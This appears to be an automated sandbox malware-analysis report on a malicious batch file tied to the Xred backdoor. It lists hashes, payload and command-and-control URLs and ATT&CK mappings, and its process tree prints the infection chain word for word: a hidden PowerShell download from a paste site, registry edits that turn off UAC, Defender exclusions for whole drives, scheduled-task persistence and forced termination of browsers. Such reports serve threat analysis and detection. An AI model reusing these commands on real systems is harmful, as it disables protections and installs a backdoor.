Overview

overview

10

Static

static

1

NEW-DRAWING-SHEET.bat

windows7-x64

10

NEW-DRAWING-SHEET.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-12-2024 10:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NEW-DRAWING-SHEET.bat

  • Size

    41KB

  • MD5

    6b9cf24f2b691606642bd18bf2227a62

  • SHA1

    046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc

  • SHA256

    f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1

  • SHA512

    db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e

  • SSDEEP

    768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO

Score
10/10
xredbackdoordefense_evasiondiscoveryevasionexecutionpersistenceprivilege_escalationtrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://paste.fo/raw/a1af5a4d0301

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Xred

    Xred is backdoor written in Delphi.

    backdoorxred
  • Xred family
    xred
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

    Possible Turn off User Account Control's privilege elevation for standard users.

    defense_evasionpersistenceprivilege_escalation
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • AutoIT Executable 17 IoCs

    AutoIT scripts compiled to PE executables.

  • UPX packed file 20 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 12 IoCs
    evasion
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 12 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4028
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat'))"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3972
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2288
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • Modifies registry key
            PID:3700
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
            5⤵
            • Hijack Execution Flow: Executable Installer File Permissions Weakness
            • Modifies registry key
            PID:4764
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:4484
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:3116
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:4824
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:3640
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:4044
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:3920
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:3048
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:4260
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • Modifies registry key
            PID:4832
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • Modifies registry key
            PID:112
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3028
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2476
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1520
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4572
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4552
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
        3⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2908
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffff7bb46f8,0x7ffff7bb4708,0x7ffff7bb4718
          4⤵
            PID:2072
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
            4⤵
              PID:3076
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4452
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
              4⤵
                PID:4796
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                4⤵
                  PID:4768
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                  4⤵
                    PID:8
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
                    4⤵
                      PID:1744
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
                      4⤵
                        PID:4492
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
                        4⤵
                          PID:3996
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1520
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
                          4⤵
                            PID:2308
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
                            4⤵
                              PID:772
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5812 /prefetch:8
                              4⤵
                                PID:1536
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
                                4⤵
                                  PID:4468
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5728 /prefetch:8
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4272
                              • C:\Windows\system32\timeout.exe
                                timeout /t 9
                                3⤵
                                • Delays execution with timeout.exe
                                PID:3224
                              • C:\Program Files\7-Zip\7z.exe
                                "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOC.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1496
                              • C:\Windows\system32\timeout.exe
                                timeout /t 9
                                3⤵
                                • Delays execution with timeout.exe
                                PID:4944
                              • C:\Users\Admin\AppData\Local\Temp\Startup\DOC.exe
                                "C:\Users\Admin\AppData\Local\Temp\Startup\DOC.exe"
                                3⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • System Location Discovery: System Language Discovery
                                • Modifies registry class
                                PID:2080
                                • C:\Users\Admin\AppData\Local\Temp\._cache_DOC.exe
                                  "C:\Users\Admin\AppData\Local\Temp\._cache_DOC.exe"
                                  4⤵
                                  • Drops startup file
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • System Location Discovery: System Language Discovery
                                  • NTFS ADS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: GetForegroundWindowSpam
                                  PID:4032
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c schtasks /create /tn MRIYKG.exe /tr C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe /sc minute /mo 1
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4496
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /create /tn MRIYKG.exe /tr C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe /sc minute /mo 1
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:3156
                                  • C:\Windows\SysWOW64\WSCript.exe
                                    WSCript C:\Users\Admin\AppData\Local\Temp\MRIYKG.vbs
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2420
                                • C:\ProgramData\Synaptics\Synaptics.exe
                                  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                  4⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Modifies registry class
                                  PID:4840
                                  • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
                                    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
                                    5⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:4940
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM chrome.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1708
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM firefox.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1704
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM msedge.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1744
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM iexplore.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3324
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM opera.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1244
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM safari.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2856
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM brave.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2628
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM vivaldi.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1712
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM epic.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4380
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM yandex.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2196
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM tor.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4944
                              • C:\Windows\system32\taskkill.exe
                                taskkill /F /IM CMD.exe
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2896
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:2984
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:436
                              • C:\Windows\system32\backgroundTaskHost.exe
                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                1⤵
                                  PID:3428
                                • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                  1⤵
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Suspicious behavior: AddClipboardFormatListener
                                  • Suspicious use of SetWindowsHookEx
                                  PID:3244
                                • C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe
                                  C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:1016
                                • C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe
                                  C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:4304
                                • C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe
                                  C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:3376

                                Network

                                MITRE ATT&CK Enterprise v15

                                Reconnaissance

                                Resource Development

                                Initial Access

                                Execution

                                Command and Scripting Interpreter

                                1
                                T1059

                                PowerShell

                                1
                                T1059.001

                                Scheduled Task/Job

                                1
                                T1053

                                Scheduled Task

                                1
                                T1053.005

                                Persistence

                                Boot or Logon Autostart Execution

                                1
                                T1547

                                Registry Run Keys / Startup Folder

                                1
                                T1547.001

                                Hijack Execution Flow

                                1
                                T1574

                                Executable Installer File Permissions Weakness

                                1
                                T1574.005

                                Scheduled Task/Job

                                1
                                T1053

                                Scheduled Task

                                1
                                T1053.005

                                Privilege Escalation

                                Abuse Elevation Control Mechanism

                                1
                                T1548

                                Bypass User Account Control

                                1
                                T1548.002

                                Boot or Logon Autostart Execution

                                1
                                T1547

                                Registry Run Keys / Startup Folder

                                1
                                T1547.001

                                Hijack Execution Flow

                                1
                                T1574

                                Executable Installer File Permissions Weakness

                                1
                                T1574.005

                                Scheduled Task/Job

                                1
                                T1053

                                Scheduled Task

                                1
                                T1053.005

                                Defense Evasion

                                Abuse Elevation Control Mechanism

                                1
                                T1548

                                Bypass User Account Control

                                1
                                T1548.002

                                Hijack Execution Flow

                                1
                                T1574

                                Executable Installer File Permissions Weakness

                                1
                                T1574.005

                                Impair Defenses

                                1
                                T1562

                                Disable or Modify Tools

                                1
                                T1562.001

                                Modify Registry

                                3
                                T1112

                                Credential Access

                                Discovery

                                Browser Information Discovery

                                1
                                T1217

                                Query Registry

                                3
                                T1012

                                System Information Discovery

                                4
                                T1082

                                System Location Discovery

                                1
                                T1614

                                System Language Discovery

                                1
                                T1614.001

                                Lateral Movement

                                Collection

                                Command and Control

                                Web Service

                                1
                                T1102

                                Exfiltration

                                Impact

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                  Filesize

                                  2KB

                                  MD5

                                  2f57fde6b33e89a63cf0dfdd6e60a351

                                  SHA1

                                  445bf1b07223a04f8a159581a3d37d630273010f

                                  SHA256

                                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                  SHA512

                                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                  Filesize

                                  152B

                                  MD5

                                  443a627d539ca4eab732bad0cbe7332b

                                  SHA1

                                  86b18b906a1acd2a22f4b2c78ac3564c394a9569

                                  SHA256

                                  1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

                                  SHA512

                                  923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                  Filesize

                                  152B

                                  MD5

                                  99afa4934d1e3c56bbce114b356e8a99

                                  SHA1

                                  3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

                                  SHA256

                                  08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

                                  SHA512

                                  76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                  Filesize

                                  5KB

                                  MD5

                                  83b94692368e4c0b438f2cfc7227df09

                                  SHA1

                                  cd156c759146e8d0b3a486077818906692e64130

                                  SHA256

                                  8767f64c018f7d6e0f8bf7d56bf1dc2ccefefc5c0d138603ddb207c241b31a1c

                                  SHA512

                                  27400f61c43bb3e8cfc4bb3d520fd2ebab2ab9e571c16c292717e00ec5cf37e9738053ae2f3aea34bf97f4024a2b8f79c9127ac234f35444ff7721dd99cb7861

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                  Filesize

                                  6KB

                                  MD5

                                  f807f73bb59ab5ac6a4db19465b16781

                                  SHA1

                                  f73c06022f5b54b838ee01dd2fcbb1e0298edff1

                                  SHA256

                                  31970231c598944c6d4d5c34bef84e00480b069c4d8926c873011a12c8afa2e0

                                  SHA512

                                  c384c8976c1c9c01057e9b8b5ee151b787db893e6c089dd92206b76fd89d37186315060158d00f83ce6177165ba388fbafa13f7e663615d7e5d3c619b31f3845

                                  Download Submit

